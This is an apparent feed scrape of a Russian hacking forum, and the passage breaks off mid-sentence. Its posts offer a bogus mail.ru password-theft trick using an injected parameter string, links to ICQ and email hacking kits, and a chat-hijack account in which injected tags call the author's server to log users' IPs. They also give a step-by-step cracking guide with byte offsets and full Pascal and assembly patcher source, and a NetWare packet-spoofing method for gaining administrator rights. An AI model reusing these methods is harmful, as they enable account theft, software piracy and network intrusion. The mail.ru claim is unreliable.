https://viktoro2007.apbb.ru/ Viking ru-ru Sat, 05 May 2012 16:38:57 +0400 MyBB/mybb.ru https://viktoro2007.apbb.ru/viewtopic.php?pid=43#p43 <p>На самом деле,пароль легко взломать просто надо уметь. Поработав немного в инете, взломал мэйл.<br />Отправляешь письмо на parolremind@mail.ru<br />это робот,напоминающий забытые пароли<br />Вместо темы пишешь login=vasya_pupkin@mail.ru&amp;pass=&amp;answer=%20%login=hacker@mail.ru&amp;pass=qwerty&amp;answer=<br />где vasya_pupkin -это мыло который ты хочешь взломать а hacкer@mail.ru это твой твой логин<br />qwerty-это твой пароль. Дело в том,что послав это письмо робот определяет что ты действительно зарегистрирована, но вместо твоего пароля он отправляет пароль твоей жертвы, всё просто</p> mybb@mybb.ru (Hackermaker) Sat, 05 May 2012 16:38:57 +0400 https://viktoro2007.apbb.ru/viewtopic.php?pid=43#p43 https://viktoro2007.apbb.ru/viewtopic.php?pid=42#p42 <p>Взлом ICQ(Аськи),видеоурок взлома + снифер к видео,100% взлом,размер файла:10.54 MB , ссылка для скачивания: <a href="http://depositfiles.com/ru/files/ifhwpvqwz" rel="nofollow" target="_blank">http://depositfiles.com/ru/files/ifhwpvqwz</a> .</p> mybb@mybb.ru (wwwmaster) Sun, 19 Apr 2009 09:09:21 +0400 https://viktoro2007.apbb.ru/viewtopic.php?pid=42#p42 https://viktoro2007.apbb.ru/viewtopic.php?pid=41#p41 <p>Взлом почты на mail.ru,yandex.ru: 2 видеоурока,100% взлом,проверено,размер файла: 10.56 MB, ссылка для скачивания : <a href="http://depositfiles.com/ru/files/ml6r37gpc" rel="nofollow" target="_blank">http://depositfiles.com/ru/files/ml6r37gpc</a> .</p> mybb@mybb.ru (wwwmaster) Sun, 19 Apr 2009 09:08:15 +0400 https://viktoro2007.apbb.ru/viewtopic.php?pid=41#p41 https://viktoro2007.apbb.ru/viewtopic.php?pid=40#p40 <p>Подскажите, пожалуйста где я могу скачать&#160; ниже указанные программы, спасибо!<br />Windows 2k<br />сканер Essential Net Tools v3.0<br />&#160; HakTek v1.1</p> mybb@mybb.ru (Andri) Mon, 16 Jun 2008 23:08:54 +0400 https://viktoro2007.apbb.ru/viewtopic.php?pid=40#p40 https://viktoro2007.apbb.ru/viewtopic.php?pid=39#p39 <p>О &quot;взломах&quot; html-чатов </p> <p>Я предполагаю, что читатель знает, что такое CGI, и на этом построю своё объяснение. </p> <p>Начал я с малого. </p> <p>В любом чате фрейм, в котором ты пишешь сообщения, генерится динамически (для каждого входящего) и, возможно, содержит несколько скрытых полей. Типа &lt;input type=hidden name=cookie value=SP202134&gt; (так в партизанах хранится UserID) </p> <p>Идея в следующем: сохраняем содержимое этого фрейма на диске и исправляем его так, что бы можно было с ним работать со своего винта. Т.е. заменяем ссылки типа /cgi-bin/refresh.pl на полный путь wwwchat.nsk.su/cgi-bin/refresh.pl и вместо скрытых полей формы пишем типа &lt;input type=text name=cookie value=SP202134&gt; (что бы можно было их изменять) После этого делаем HTML документ для &quot;сборки чата&quot; из кусков. Т.е. примерно так </p> <p>&#160; &#160;&quot;First.htm&quot;<br />&lt;html&gt;<br />&lt;frameset rows=&quot;80%,20%&quot;&gt;<br />&#160; &#160;&lt;frameset cols=&quot;70%,30%&quot;&gt;<br />&#160; &#160; &lt;frame name=&quot;razg&quot; src=&quot;http://www.chat.nsk.su/cgi-bin/refresh.cgi?win+razgovor+nocookie#end&quot;&gt;<br />&#160; &#160; &lt;frame name=&quot;rigt&quot; src=&quot;http://www.chat.nsk.su/right.html&quot;&gt;<br />&#160; &#160;&lt;/frameset&gt;<br />&#160; &#160;<br />&#160; &#160;&lt;frame name=&quot;bot&quot; src=&quot;start.htm&quot;&gt;<br />&lt;/frameset&gt;<br />&lt;/html&gt;</p> <p>Start.htm - это и есть тот фрейм который я сохранил и изменил </p> <p>После этого я просто броузером открывал эту страницу (First.htm). И сразу(!!!) попадал в чат, минуя стандартную процедуру входа. Это позволило : <br />1. Обходить зарегистрированные имена <br />2. Прятать свой IP от киллеров, за счет взятия чужого ID'a </p> <p>Дальше мне стало интересно вычислить IP участников. Я обнаружил, что не запрещён тэг &lt;bgsound src=&quot;&quot;&gt;. Это позволило вставлять в своё сообщение ресурс со своей машины. Сам по себе звук на хер не нужен, но этот косяк позволил вставить в свой месс строку типа &lt;bgsound src=&quot;http://MyIP/cgi-bin/spy.exe&quot;&gt;. Этот скрипт (spy.exe) вызывался с машины КАЖДОГО участника чата. Это позволило увидеть IP всех (скрипт просто сохранял мне на винт данные из переменной окружения REMOTE_ADDR). Это мне не очень понравилось, тк не понятно было где чей IP. Примерно в это-же время в чате появились приваты. Это значит, что документ в главном фрейме (тот где мессы все) стал называться по другому. </p> <p>До приватов : <br /><a href="http://www.chat.nsk.su/cgi-bin/refresh.cgi?win+razgovor#end" rel="nofollow" target="_blank">http://www.chat.nsk.su/cgi-bin/refresh. &#8230; zgovor#end</a> </p> <p>После появления приватов : <br /><a href="http://www.chat.nsk.su/cgi-bin/refresh.cgi?win+razgovor+SP345678#end" rel="nofollow" target="_blank">http://www.chat.nsk.su/cgi-bin/refresh. &#8230; 345678#end</a> </p> <p>Где SP456789 - UserID </p> <p>После этого в скрипт (spy.exe) был добавлен вывод ID'a из переменной окружения HTTP_REFERER Ну а сопоставить ник с ID'ом не проблемма, тк ID каждого прописан там же примерно в такой строке </p> <p>&#160; &#160;&lt;br&gt;&lt;b&gt;&lt;font color=yellow size=-1&gt;Тут ник&lt;/font&gt;&lt;/b&gt;<br />&#160; &#160;&lt;font color=black&gt;&lt;a href=&quot;/cgi-bin/private_form.cgi?SP448188&quot;&gt;<br />&#160; &#160;&lt;img src=/img/mes.gif border=0 vspace=0&gt;&lt;/a&gt;&lt;/font&gt;</p> <p>(Это строка взята из правого фрейма, где можно вызвать функцию &quot;Кто в чате&quot;) </p> <p>После этого перестало быть проблемой сопоставление ника и IP. Затем я решил позабавиться с приватами. </p> <p>Используя метод сохранения странички на винт (описанный выше), я получил форму для отправления приватов от КОГО-ТО КОМУ-ТО. Т.е. я смог в отсылаемом приватно сообщении проставлять имя отправителя. </p> <p>Осталось только одно. Я знал, что в чате есть киллеры, но ничего не знал про то, что это, где это, как это. Знал только, что для того, чтобы киллерствовать надо зайти на какую-то страничку. Очевидно, что в этой киллерской страничке показываются имена. Я предположил, что моё имя показываются таким, каким я его ввожу. Исходя из этого, я под именем &lt;bgsound src=&quot;http://MyIP/cgi-bin/spy.exe&quot;&gt; MyNick зашел в чат (через прокси), и начал легонько ругаться (мне надо было, чтобы киллеры зашли на свою страничку). После этого (когда меня убили) я разгреб лог моего ВебСервера (OmniHTTPd beta) и увидел там обращение со страници не относящейся к известным мне страницам чата. Я полез на эту страницу и получил запрос на ввод пароля, со словами &quot;Дорогой администратор...&quot;. Это приятно согрело душу. Дальше я начал думать, то ли подобрать пароль, то ли ещё что придумать. Но ситуация так сложилась, что я оказался в одной сети с киллером, и, запустив сниффер, я поимел пароль. </p> <p>Ну вот и все.</p> mybb@mybb.ru (2525) Sun, 16 Dec 2007 18:26:48 +0300 https://viktoro2007.apbb.ru/viewtopic.php?pid=39#p39 https://viktoro2007.apbb.ru/viewtopic.php?pid=38#p38 <p>ВЗЛОМ WINDOWS-ПРИЛОЖЕНИЙ</p> <p>Для начала я научу вас пользоваться W32Dasm. Я не хочу вам давать детальную помощь, как делать краки, но я могу научить вас самим добывать себе умения и навыки взлома.<br />Когда вы используете W32Dasm, знайте, что он не даст вам серийные номера или коды, он лишь покажет путь, где находится место, где можно эти номера вводить. То, что я делаю каждый день при взломе программ, будет описано в этом справочнике, шаг за шагом.</p> <p>ИНСТРУМЕНТЫ :<br />из инструментов взлома вам нужно следующее : W32Dasm 8.5 или боолее позднюю версию, Hacker's View 5.24, Norton Commander (я позднее объясню, почему я его использую).<br />Turbo Pascal 7.0<br />TASM и TLINK 3.0</p> <p>ЧАСТЬ 1 : Как кракнуть Quick View Plus 4.0</p> <p>Шаг 1. Запустите ORDER32.EXE</p> <p>Шаг 2. Кликните на $49 Single User License (вы можете кликнуть и на $59), затем ACCEPT, потом UNLOCK BY PHONE.</p> <p>Шаг 3. Введите любой код для получения сообщения об ошибке (вы должны записать это сообщение), потом выйдите из программы, кликнув на CANCEL.</p> <p>Шаг 4. Запустите Norton Comander, перейдите в директорию QVP.</p> <p>Шаг 5. Скопируйте ORDER32.EXE в ORDER32.EXX (для&#160; сохранности), а затем скопируйте&#160; ORDER32.EXE в 1.EXE<br />(для&#160; &#160; использования в W32Dasm).</p> <p>Шаг 6. Запустите W32Dasm и раздессимблируйте 1.EXE.</p> <p>Шаг 7. После этого, кликните на STRING DATA REFERENCE, найдите там сообщение &quot;You have entered an incorrect code.Please check your entry&quot; (вы должны помнить,что это было сообщение об ошибке) и дважды щелкните мышью по нему.</p> <p>Шаг 8. Закройте SDR окно. Вы должны увидеть сообщение:<br />&#160; &#160; &#160; &#160; &#160; &#160; * Possible reference to String Resource ID=00041: &quot;You have entered...<br />&#160; &#160; &#160; &#160; &#160; &#160; :004049F8 6A29 push 00000029<br />&#160; &#160; &#160; &#160; &#160; &#160; :004049FA FF353CCE4000 push dword ptr [0040CE3C]</p> <p>Шаг 9. ОК, теперь вы должны найти последнее сравнение типа CMP,JNE, JE,TEST и т.д. перед сообщением об ошибке.<br />Нажимайте стрелку &quot;вверх&quot;, пока не найдете :<br />&#160; &#160; &#160; &#160; &#160; &#160; :004049CD 755A jne 00404A29<br />&#160; &#160; &#160; &#160; &#160; &#160; * Possible reference to String Resource ID=00032: &quot;You must select...<br />&#160; &#160; &#160; &#160; &#160; &#160; :004049CF 6A20 push 00000020<br />&#160; &#160; &#160; &#160; &#160; &#160; ...<br />&#160; &#160; &#160; &#160; &#160; &#160; ...<br />&#160; &#160; &#160; &#160; &#160; &#160; * Possible reference to String Resource ID=00040: &quot;Unlock Error&quot;</p> <p>Шаг 10. Теперь вы знаете, куда идет скачок при введении неправильного кода. Теперь можно посмотреть, что произойдет, если &quot;jne&quot; на &quot;je&quot;. Убедитесь, что зеленая полоска находится на надписи:<br />&#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160;004049CD 755A jne 00404A29, вы должны увидеть&#160; Offset address внизу на статусной строке типа<br />&#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160;@Offset 00003DCDh Это место, где вы можете внести изменения в ORDER32.EXE.</p> <p>Шаг 11. Перейдите обратно в Norton Commander, запустите HIEW ORDER32.EXE, нажмите&#160; F4 для выбора режима декодирования (Decode Mode), нажмите F5 и введите 3DCD.<br />&#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160;Вы должны увидеть следующее :<br />&#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160;00003DCD: 755A jne 000003E29<br />&#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160;00003DCF: 6A20 push 020<br />&#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160;00003DD1: FF15 call w,[di]</p> <p>Шаг 12. Это то место, где вы можете изменить байты, нажмите F3, введите 74, нажмите F9 для обновления ORDER32.EXE. Выйдите из HIEW.</p> <p>Шаг 13. Запустите ORDER32.EXE, введите любой код. Ура ! Мы сломали QVP 4.0 !<br />Но ! Что будет, если ввести настоящий серийный номер ? Появляется сообщение об ошибке ! Что это ?</p> <p>Шаг 14. Снова запустиите HIEW ORDER32.EXE, нажмите F4, выберите Decode, нажмите F5&#160; и введите 3DCD. Нажмите F3, введите EB, нажмите F9. Вы прямо &quot;прыгнете&quot; на Unlocked диалог.</p> <p>ЧАСТЬ 2 : Как кракнуть Hex WorkShop 2.51</p> <p>Шаг 1. Запустите HWORKS32.EXE</p> <p>Шаг 2. Кликните на HELP, About HEX Wo..</p> <p>Шаг 3. Введите любой код, чтобы получить сообщение об ошибке (вы должны записать это&#160; сообщение) и выйдите из программы.</p> <p>Шаг 4. Запустите Norton Commander, перейдите в директорию HWS. </p> <p>Шаг 5. Скопируйте файл HWORKS32.EXE в HWORKS32.EXX <br />(для сохранности) и скопируйте файл HWORKS32.EXE в 1.EXE (для использования в W32Dasm).</p> <p>Шаг 6. Запустите W32Dasm и &quot;разберите&quot; 1.EXE.</p> <p>Шаг 7. После этого, нажмите мышью на FIND TEXT, введите <br />&quot;You have entered an&quot; (вы должны помнить, что это&#160; &#160; &#160; &#160; &#160; &#160; &#160;сообщение об ошибочно введенном серийном номере) и найдите соответствующую строку (вы не сможете сделать это в SDR-окне !)</p> <p>Шаг 8. Вы должны увидеть следующую строку :<br />Name: DialogID_0075, # of Controls=003, Caption:<br />&quot;Registration Unsucce..<br />001-ControlID:FFFF, Control Class:&quot;&quot;Control Text:&quot;You have entered an..<br />002-ControlID:FFFF, Control Class:&quot;&quot;Control Text:&quot;Please confirm you..</p> <p>Шаг 9. Оk, теперь вы знаете, что ControlID будет использоваться, когда вы введете&#160; неверный код. Кликните FIND TEXT, введите &quot;dialogid_0075&quot; и вы найдете:<br />&#160; &#160; &#160; &#160; &#160; &#160; * Possible reference to DialogID_0075<br />&#160; &#160; &#160; &#160; &#160; &#160; :0041E233 6A75 push 00000075<br />&#160; &#160; &#160; &#160; &#160; &#160; :0041E235 8D8D10FFFFFF lea ecx, dword ptr [ebp+FF10]</p> <p>Шаг 10. Теперь вы должны поискать последнюю ссылку, типа<br />CMP, JNE, JE и пр. перед диалогом об ошибке. Нажимайте клавишу &quot;вверх&quot;, пока не найдете :<br />&#160; &#160; &#160; &#160; &#160; &#160; &#160;:0041E145 837DEC00 cmp dword ptr [ebp-14], 00000000<br />&#160; &#160; &#160; &#160; &#160; &#160; &#160;:0041E149 0F8479000000 je 0041E1C8<br />&#160; &#160; &#160; &#160; &#160; &#160; &#160;:0041E14F 8B8DFCFEFFFF mov ecx, dword ptr [ebp+FEFC]</p> <p>Шаг 11. Теперь вам нужно посмотреть, что произойдет, если &quot;je&quot; заменить на &quot;jne&quot;. Убедитесь, что зеленая полоска установлена на строке <br />&#160; &#160; &#160; &#160; &#160; &#160; &#160;:0041E149 0F8479000000 je 0041E1C8.<br />Вы должны на нижней статусной строке увидеть оффсетный адрес, типа : @Offset0001D549h. Это то место, где вы сможете кракнуть HWORKS32.EXE</p> <p>Шаг 12. Перейдите обратно в Norton Commander, запустите HIEW HWORKS32.EXE, нажмите F4 для выбора режима декодирования (Decode Mode), нажмите F5 и введите&#160; <br />&#160; &#160; &#160; &#160; &#160; &#160; &#160; ID549.<br />&#160; &#160; &#160; &#160; &#160; &#160; &#160; Вы должны увидеть следующее :<br />&#160; &#160; &#160; &#160; &#160; &#160; &#160; 0001D549: 0F847900 je 00001D5C6 ---------- (1)<br />&#160; &#160; &#160; &#160; &#160; &#160; &#160; 0001D54D: 0000 add [bx][si],al<br />&#160; &#160; &#160; &#160; &#160; &#160; &#160; 0001D54F: 8B8DFCFE mov cx,[di][0FEFC]</p> <p>Шаг 13. Это то место, где вы сможете изменить несколько байтов, нажмите F3, введите&#160; 0F85, нажмите F9 для обновления файла HWORKS32.EXE. Выйдите из HIEW.<br />Шаг 14. Запустите HWORKS32.EXE и введите любой код, работает ? НЕТ !?!??!?!<br />Хе-хе-хе... Не волнуйтесь ! Снова перейдите в Нортон. <br />Скопируйте HWORKS32.EXX в HWORKS32.EXE (теперь<br />вы видите, почему я делаю копию файла с расширением<br />ЕХХ&#160; для сохранности). Теперь перейдите в W32Dasm, вы<br />должны перейти туда, где только что были (на 0041У145).</p> <p>Шаг 15. Нажмите F3 для очередного поиска &quot;DialogID_0075&quot;, вы должны найти :<br />&#160; &#160; &#160; &#160; &#160; &#160; &#160;* Possible reference to DialogID_0075<br />&#160; &#160; &#160; &#160; &#160; &#160; &#160;:00430ADD 6A75 push 00000075<br />&#160; &#160; &#160; &#160; &#160; &#160; &#160;:00430ADF 8D8D10FFFFFF lea ecx, dword ptr [ebp+FF10]</p> <p>Шаг 16. Ok, теперь вы теперь можете посмотреть на последние ссылки, типа CMP, JNE,&#160; JE и т.д. перед диалогом об ошибке. Нажимайте стрелку вверх, пока не найдете :<br />&#160; &#160; &#160; &#160; &#160; &#160; &#160;:004309EF 837DEC00 cmp dword ptr [ebp-14], 00000000<br />&#160; &#160; &#160; &#160; &#160; &#160; &#160;:004309F3 0F8479000000 je 00430A72<br />&#160; &#160; &#160; &#160; &#160; &#160; &#160;:004309F9 8B8DFCFEFFFF mov ecx, dword ptr [ebp+FEFC]</p> <p>Шаг 17. Теперь вы можете посмотреть, что произойдет, если &quot;je&quot; заменить на 'jne&quot;. (это должно сработать). Переместите<br />полоску на :004309F3 0F8479000000 je 00430A72. На статусной строке внизу экрана вы&#160; должны следующее:<br />@Offset0002FDF3h (оффсетный адрес). Это то место, где<br />вы сможете кракнуть HWORKS32.EXE.</p> <p>Шаг 18. Перейдите в Norton Commander, запустите HIEW<br />HWORKS32.EXE, нажмите F4 для&#160; выбора Decode Mode <br />(ASM), нажмите F5 и введите 2FDF3. Вы должны увидеть:<br />&#160; &#160; &#160; &#160; &#160; &#160; &#160;0002FDF3: 0F847900 je 00001D5C6 ---------- (1)<br />&#160; &#160; &#160; &#160; &#160; &#160; &#160;0002FDF7: 0000 add [bx][si],al<br />&#160; &#160; &#160; &#160; &#160; &#160; &#160;0002FDF9: 8B8DFCFE mov cx,[di][0FEFC]</p> <p>Шаг 19. Это то место, где вы сможете изменить несколько байтов, нажмите F3, введите&#160; 0F85, нажмите F9 для обновления файла HWORKS32.EXE. Выйдите из HIEW.<br />Шаг 20. Запустите снова HWORKS32.EXE и введите любой код. Работает ? Виола !!!&#160; Поздравляю !!! Вы кракнули HEX<br />WorkShop 2.51 !</p> <p>ЧАСТЬ 3 :Как сделать собственный патч</p> <p>Здесь напечатан исходный код на Паскале :</p> <p>&#160; &#160; ------------------------&lt;cut here&gt;-------------------------------------------<br />Uses Crt;</p> <p>Const A: Array[1..1] of Record {&lt;-------- 1 byte to be patched}<br />A : Longint;<br />B : Byte;</p> <p>End =<br />((A:$3DCD;B:$EB)); {&lt;--------------- offset &quot;3DCD&quot; and byte &quot;EB&quot; to be changed}</p> <p>Var Ch:Char;<br />I:Byte;<br />F:File;<br />FN:file of byte;<br />Size:longint;</p> <p>Begin<br />Writeln('TKC''s Little Patch');writeln('Crack for QVP 4.0 by TKC/PC ''97');<br />Assign(F,'ORDER32.EXE'); {&lt;-------------- filename to be patched}<br />{$I-} Reset(F,1); {$I+}<br />If IOResult &lt;&gt; 0 then<br />begin<br />writeln('File not found!');<br />halt(1);<br />end;<br />For I:=1 to 1 do {&lt;---------------------- 1 byte to be patched}</p> <p>Begin<br />Seek(F,A[i].A);<br />Ch:=Char(A[i].B);<br />Blockwrite(F,Ch,1);<br />End;<br />Writeln('File successfully patched!');<br />End.<br />------------------------&lt;cut here&gt;-------------------------------------------</p> <p>Here's the source code for Assembler:</p> <p>------------------------&lt;cut here&gt;-------------------------------------------<br />DOSSEG<br />.MODEL SMALL<br />.STACK 500h<br />.DATA<br />.CODE<br />PatchL EQU 6<br />Buffer Db PatchL Dup(1)<br />handle dw ?<br />intro db &quot;TKC's Little Patch&quot;,0dh,0ah,&quot;Crack for QVP 4.0 by TKC/PC '97$&quot;</p> <p>FileName db &quot;ORDER32.EXE&quot;,0 ;&lt;------- filename to be patched<br />notfound db 0dh,0ah,&quot;File not found!$&quot;<br />cracked db 0dh,0ah,&quot;File successfully patched. Enjoy!$&quot;<br />Cant db 0dh,0ah,&quot;Can't write to file.$&quot;<br />Done db &quot;File has been made.$&quot;<br />String db 0EBh,0 ;&lt;------------- byte &quot;EB&quot; to be patched</p> <p>START:<br />mov ax,cs<br />mov ds,ax<br />mov dx,offset intro ;point to the time prompt<br />mov ah,9 ;DOS: print string<br />int 21h<br />jmp openfile</p> <p>openfile:</p> <p>mov ax,cs<br />mov ds,ax<br />mov ax,3d02h<br />mov dx,offset FileName<br />int 21h<br />mov handle,ax<br />cmp ax,02h<br />je filedontexist<br />jmp write</p> <p>filedontexist:<br />mov ax,cs<br />mov ds,ax<br />mov dx,offset notfound<br />mov ah,9 ;DOS: print string<br />int 21h ;display the time prompt<br />jmp exit</p> <p>Write:<br />mov bx,handle<br />mov cx,0000h<br />mov dx,3DCDh ;&lt;------------- offset &quot;3DCD&quot;<br />mov&#160; &#160; ax,4200h<br />int 21h</p> <p>mov cx,patchl<br />mov dx,offset String<br />mov ah,40h<br />mov cx,01h<br />int 21h<br />mov ax,cs<br />mov ds,ax<br />mov dx,offset cracked<br />mov ah,9 ;DOS: print string<br />int 21h ;display the time prompt<br />jmp Exit</p> <p>Exit:<br />mov ah,3eh<br />int 21h<br />mov ax,4c00h<br />int 21h<br />END START<br />--------------------------&lt;cut here&gt;-----------------------------------------</p> <p>Заключительные слова :</p> <p>Здесь несколько важных функций, используемых для крака :</p> <p>Hex: Asm: Means<br />75 or 0F85 jne jump if not equal<br />74 or 0F84 je jump if equal<br />EB jmp jump directly to<br />90 nop no operation<br />77 or 0F87 ja jump if above<br />0F86 jna jump if not above<br />0F83 jae jump if above or equal<br />0F82 jnae jump if not above or equal<br />0F82 jb jump if below<br />0F83 jnb jump if not below<br />0F86 jbe jump if below or equal</p> <p>0F87 jnbe jump if not below or equal<br />0F8F jg jump if greater<br />0F8E jng jump if not greater<br />0F8D jge jump if greater or equal<br />0F8C jnge jump if not greater or equal<br />0F8C jl jump if less<br />0F8D jnl jump if not less<br />0F8E jle jump if less or equal<br />0F8F jnle jump if not less or equal</p> <p>Ваши небольшие знания по Ассемберу, вам, естественно, помогут, и они вам потребуются для использования Soft-ICE. Кроме того, вы сможете кракать эти куски с помощью&#160; W32Dasm как маньяк :-) Вы не сможете дизассемблировать программы на Visual Basic, для него вам понадобятся специальные декомпилеры.</p> <p>Удачи !</p> mybb@mybb.ru (2525) Sun, 16 Dec 2007 18:25:27 +0300 https://viktoro2007.apbb.ru/viewtopic.php?pid=38#p38 https://viktoro2007.apbb.ru/viewtopic.php?pid=37#p37 <p>Черный ход в NetWare<br />Уделяя основное внимание защите информации в сети Internet, мы забываем, что подавляющее большинство сетей в России базируется на Novell NetWare.</p> <p>--------------------------------------------------------------------------------</p> <p>ПОДДЕЛКА АДРЕСОВ <br />ГОЛЛАНДСКАЯ АТАКА <br />АТАКА ПО-РУССКИ <br />ПОДПИСЬ ПАКЕТОВ <br />ДРУГИЕ АСПЕКТЫ БЕЗОПАСНОСТИ <br />--------------------------------------------------------------------------------</p> <p>В предыдущих номерах LAN уже печатались материалы, посвященные системе безопасности сети Novell NetWare. В данной статье хотелось бы рассказать о некоторых аспектах ее защиты на сетевом уровне, об ее достоинствах и недостатках.</p> <p>Как правило, сеть NetWare базируется на протоколе IPX (в принципе использование IP возможно, но нами этот вариант рассматриваться не будет).</p> <p>Протокол IPX был разработан фирмой Xerox, а затем доработан компанией Novell. IPX предназначен для применения в локальных сетях. Предполагается, что вся сеть разделена на логические сегменты, и все они получают уникальный номер. Адрес (идентификатор) рабочей станции в IPX-пакете совпадает с уникальным для каждой сетевой платы номером (MAC-адресом). Структура заголовка IPX-пакета изображена на Рисунке 1.<br /></p> <p>Рисунок 1.<br />Структура заголовка пакета IPX.</p> <p>ПОДДЕЛКА АДРЕСОВ<br />В локальных сетях типа Ethernet пакеты IPX обычно передаются с использованием кадров Ethernet_802.2 или Ethernet_802.3, в заголовках которых основной информацией являются MAC-адреса станций получателя и отправителя. Адрес отправителя после посылки никем не проверяется, так как это непростая задача. Даже в том случае, если адрес отправителя кем-либо анализируется (например, коммутатором), подставить чужой MAC-адрес не составит труда. Почти все сетевые платы позволяют сделать это как с помощью программных средств Novell (в net.cfg), так и на низком уровне. А ODI-драйвер ODIPKT позволяет самостоятельно сформировать весь пакет и послать его как есть. </p> <p>Таким образом, пакет, совершенно идентичный пакету администратора можно передать как на уровне Ethernet, так и на уровне IPX. Это означает, что протокол IPX сам по себе совершенно не защищен от посягательств на целостность сети. Следовательно, нарушить работоспособность системы может практически любой пользователь сети (не говоря о профессионалах).</p> <p>К примеру, если был послан пакет с полем получателя FF,FF,FF,FF,FF,FF (всем станциям в текущем сегменте сети) в кадре Ethernet, то независимо от адреса отправителя его обязательно получит адресат, который указывается в поле &quot;Адрес станции назначения&quot; заголовка IPX-пакета. Более того, если некто (злоумышленник) самостоятельно заполнит IPX-пакет, то он может указать чужой адрес отправителя (администратора сети); такой пакет обязательно дойдет до адресата (сервера) и будет им обработан тем же образом, что и все остальные пакеты администратора. Такой процесс называется по-английски spoofing, а по-русски &quot;подделка адресов&quot;.</p> <p>На уровень выше IPX находится протокол NCP (NetWare Core Protocol), он использует IPX в качестве транспортного протокола, но предусматривает, в отличие от IPX, некоторую степень защиты. NCP используется практически при всех сетевых операциях в сети NetWare; с его помощью передаются файлы и реплики между серверами, осуществляется администрирование системы и т. д. На Рисунке 2 изображена структура заголовка пакета NCP.<br /></p> <p>Рисунок 2.<br />Структура заголовка пакета запроса NCP.</p> <p>Пакеты на уровне NCP неосведомленному человеку подделать несколько сложнее, поскольку необходимо знать номер соединения администратора с сервером. Однако проблема эта вполне решаема благодаря таким программам, как userlist (в NetWare 3.x) и nlist (в NetWare 4.x) или системным функциям оболочки рабочей станции. Остальная информация может быть получена из других источников, к примеру из программы LANalyzer for Windows (фирмы Novell), которая позволяет перехватывать все проходящие мимо рабочей станции пакеты и затем расшифровывает каждое их поле (см. Рисунок 3). Так же можно использовать программу NetXRay (компании Cinco Networks), но, поскольку она написана не Novell, полной гарантии расшифровки пакетов нет. Правда, для использования этих двух программ необходимо иметь сетевую плату, поддерживающую режим приема всех пакетов (promiscuous mode). Большинство новых сетевых плат могут работать в этом режиме, например все сетевые платы компании 3Com.<br /></p> <p>Рисунок 3.<br />Novell LANalyzer for Windows.</p> <p>Таким образом, взломщик сети может узнать всю необходимую информацию о пакете, кроме поля &quot;порядковый номер пакета&quot;, но и тут особых проблем не будет. Это поле было введено для обеспечения гарантированной доставки пакетов. При посылке каждого пакета оно увеличивается на единицу, и, если пакет не дошел, он посылается снова. Если вклиниться в обмен пакетами между сервером и клиентом и тем самым увеличить на сервере счетчик клиентских пакетов, то клиент просто &quot;повиснет&quot;, т. к. он не будет знать нового значения этого счетчика и снова попытается послать пакет с неправильным номером. Сервер же, получая запрос, проверяет адрес станции, адрес сети, сокет, номер соединения и порядковый номер пакета. Если какое-либо из этих значений не соответствует ожидаемым, то он отказывается выполнять запрашиваемую операцию и не посылает ответ. </p> <p>ГОЛЛАНДСКАЯ АТАКА<br />На принципе подстановки пакетов была основана так называемая голландская атака, придуманная группой голландских студентов. Существует несколько версий реализации подстановки пакетов. Наиболее известная в России программа написана на ассемблере русским программистом, вместе с ней распространяется файл, содержащий описание ее работы. Эту программу автор статьи довольно часто встречал в сети своего университета, особенно у студентов первого и второго курсов. Теоретически у того, кто ее запустит, должны появиться все права на сервер - эквивалент SUPERVISOR (программа писалась для NetWare 3.x). Но у нее существует несколько недостатков. </p> <p>Для успешного ее выполнения SUPERVISOR должен находиться в сети. Программа не пытается выяснить номер соединения администратора с сервером, а перебирает всех пользователей сети подряд, пока не получит результат. После выполнения программы в сети (кроме взломщика) останутся те, кому повезло (номера их соединений с сервером оказались больше, чем у администратора). Остальным (включая администратора) придется входить в сеть заново. </p> <p>Автор этих строк еще не видел, чтобы данная программа работала. В ее коде существует несколько ошибок, из-за которых она &quot;виснет&quot; или просто не работает.</p> <p>АТАКА ПО-РУССКИ<br />Для проверки работы алгоритма пришлось сделать новую программу. С помощью следующего нововведения удалось добиться, чтобы в сети никто не &quot;повис&quot;. Серверу посылаются подряд 256 пакетов с разными значениями в поле Sequence Number (см. Рисунок 4). Только значение поля не увеличивается, а уменьшается. Следовательно, &quot;правильный&quot; пакет серверу придет только один, и значение счетчика пакетов на сервере увеличится только на единицу. Сервер, после того как ему приходит настоящий пакет, полагая, что ответ на предыдущий запрос станции ей не дошел, делает &quot;откат&quot; в счетчике пакетов и обрабатывает запрос станции снова. Но самое главное сервер не делает откат операции, которая только что была выполнена.<br /></p> <p>Рисунок 4.<br />Схема перехвата полномочий.</p> <p>На Распечатке 1 приведен формат пакета, посылаемого подобными программами. Этот пакет эмулирует выполнение операции Equivalent To Me, позволяющей получить почти все права администратора сети (для удобства фоpмат пpиведен в опpеделениях языка ассемблеp).</p> <p>Данный пример не применим в случае сети NetWare 4.x по следующим причинам. В поколении сетей 4.х введен новый тип администратора - Admin. Для совместимости с предыдущими версиями существует SUPERVISOR, но администраторы сетей его не используют, хотя функция корректно обрабатывается сервером. Также в сетях 4.х возможно отключение поддержки базы Bindery в связи с переходом к службе каталогов NDS. Имя пользователя должно быть полным - т. е. с указанием дерева и контекста (например, 3107.inf.tsu). </p> <p>С учетом всего вышесказанного можно построить пакет, который будет приносить результат и в сети NetWare 4.x. Заголовки протоколов IPX и NCP можно оставить без изменений, а данные NCP могут быть такими, как на Распечатке 2.</p> <p>Здесь взломщик сети получает права администратора на все дерево NDS. В том случае, конечно, если подобные права есть у самого администратора, и он работает в сети.</p> <p>Следует отметить, что для получения прав администратора сети злоумышленнику в любом случае необходимо иметь доступ в сеть, хотя бы с минимальными правами. Следовательно, потенциальным взломщиком может быть только тот, кто имеет доступ к ресурсам вашего сервера. Также, вполне вероятно, что некто получит доступ в сеть, используя чужое имя входа и пароль. Наверняка в вашей сети имеются пользователи с паролями, не соответствующими правилам безопасности. Например, у них вообще может не быть пароля или он совпадает с именем пользователя. Для выявления таких пользователей существуют различные вспомогательные программы. Одна из таких программ - chknull.exe - позволяет проверить наличие паролей и степень их безопасности. Запустив ее, вы увидите список пользователей, которые не удосужились задать пароль. С параметром -p программа проверит наличие пользователей, у которых пароли совпадают с их именами входа в сеть. Также в командной строке в качестве параметра вы можете перечислить нежелательные для применения пароли и получить список пользователей с такими паролями.</p> <p>Эту программу, как и множество других, относящихся к 